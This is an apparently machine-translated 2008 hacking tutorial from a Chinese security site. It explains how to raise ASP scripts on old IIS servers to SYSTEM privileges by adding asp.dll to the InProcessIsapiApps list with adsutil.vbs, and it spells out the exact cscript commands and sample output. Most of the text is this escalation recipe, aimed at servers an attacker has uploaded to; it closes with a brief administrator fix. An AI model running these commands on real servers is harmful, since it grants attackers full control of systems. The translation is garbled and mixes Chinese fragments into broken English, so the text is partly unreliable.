asp. the dll is parsed into a system elevation of privilege-vulnerability warning-the black bar safety net

ID MYHACK58:62200820592
Type myhack58
Reporter 佚名
Modified 2008-10-07T00:00:00


Network uploaded system to enhance the asp permissions for the system in two ways: 1. Graphical under the default site---->home directory--->application protection set to low,so you can put the asp permissions set for the system. But this upgrade method is very easy to be found,so the network there is another kind of General is to use the adsutil. vbs to elevate privileges. And this is also today I'm going to talk about the adsutil. vbs elevated privileges. 2. With adsutil. vbs get. On the web I saw a lot of teach you to use this method of animation,article,but I still did not see an introduction of the principles of,below I to talk about my personal views: First, for example: There is a group of dogs,this group of dogs where there are several elders was the dog,they have the Supreme privilege,and the other Dog,their permission is pitiful. Go to the computer on: In IIS,several Dll files is to have special privileges,we can be understood as a system of permissions,just like the elders of stage of the dog. While parsing the asp asp. the dll is just like a Ordinary Dog,his authority much less the poor. So,if asp. dll also became elders was the dog,then asp does not have the system permissions,this can be established. So our idea is The asp. dll added to the privileges of the dll family. Lifting steps of: <1>first view have the privilege of a session with which. <2>add asp. dll join the privileged family of Well,here we have to practice this process. 1)see the privileges of the dll file: The command is:cscript adsutil. vbs get /W3SVC/InProcessIsapiApps Get displayed as: C:\\Inetpub\\AdminScripts>cscript adsutil. vbs get /W3SVC/InProcessIsapiApps Microsoft (R) Windows Script Host version 5.1 for Windows Copyright(C) Microsoft Corporation 1996-1999. All rights reserved. InProcessIsapiApps : (LIST) (5 Items) "C:\\WINNT\\system32\\idq.dll" "C:\\WINNT\\system32\\inetsrv\\httpext.dll" "C:\\WINNT\\system32\\inetsrv\\httpodbc.dll" "C:\\WINNT\\system32\\inetsrv\\ssinc.dll" "C:\\WINNT\\system32\\msw3prt.dll" See no,他 说明 的 是 有 特权 限 一族 为 :idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll This few file,different machine,may be different. 2)the asp. dll join the franchise family: 因为 asp.dll 是 放 在 c:\\winnt\\system32\\inetsrv\\asp.dll (the different subsystems put in the position not necessarily the same) We now added cscript adsutil. vbs set /W3SVC/InProcessIsapiApps "C:\\WINNT\\system32\\idq.dll" "C:\\WINNT\\system32\\inetsrv\\httpext.dll" "C:\\WINNT\\system32\\inetsrv\\httpodbc.dll" "C:\\WINNT\\system32\\inetsrv\\ssinc.dll" "C:\\WINNT\\system32\\msw3prt.dll""c:\\winnt\\system32\\inetsrv\\asp.dll" Well,now you can use: cscript adsutil. vbs get /W3SVC/InProcessIsapiApps to view is not added to the list A,note,the usage of get and set,a is the view a is set. There is you run the above you want to to the C:\\Inetpub\\AdminScripts>this directory. So if you are an administrator,your machine is people use this trick the asp promoted to system permissions,so,in this case,防 的 方法 就是 把 asp.dll T the privileges of a family,is to use the set this command,overwrite just those stuff. Example:cscript adsutil. vbs set /W3SVC/InProcessIsapiApps "C:\\WINNT\\system32\\idq.dll" "C:\\WINNT\\system32\\inetsrv\\httpext.dll" "C:\\WINNT\\system32\\inetsrv\\httpodbc.dll" "C:\\WINNT\\system32\\inetsrv\\ssinc.dll" "C:\\WINNT\\system32\\msw3prt.dll" So,when you then use the cscript adsutil. vbs get /W3SVC/InProcessIsapiApps this statement check,如果 没有 看见 asp.dll, Description,asp permissions and revert to the previous permissions. OK tutorial to the end